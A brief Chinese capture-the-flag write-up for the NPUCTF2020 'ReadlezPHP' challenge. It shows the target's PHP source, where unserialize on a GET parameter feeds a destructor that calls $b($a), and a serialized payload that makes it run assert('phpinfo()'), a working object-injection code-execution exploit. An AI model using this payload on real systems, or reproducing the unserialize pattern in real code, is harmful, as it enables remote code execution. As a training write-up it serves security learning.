NPUCTF2020ReadlezPHP

黑不溜秋一片
查看源码发现另一个页面 /time.php?source
然后就给了源码了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET[“data”]);
老熟人了序列化
@$ppp = unserialize($_GET[“data”]); 这边是传参数的地方
这边$b($a) 因为这个,可以利用php动态调用函数,拿取flag
这边要用到assert()函数 构成一个 

1
2
assert(phpinfo())

63.PNG

构造如下序列化 用phpstudy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp();
var_dump(serialize($c));
?>

生成:O:8:”HelloPhp”:2:{s:1:”a”;s:9:”phpinfo()”;s:1:”b”;s:6:”assert”;}
payload: ?data=O:8:”HelloPhp”:2:{s:1:”a”;s:9:”phpinfo()”;s:1:”b”;s:6:”assert”;} 就可以了

64.PNG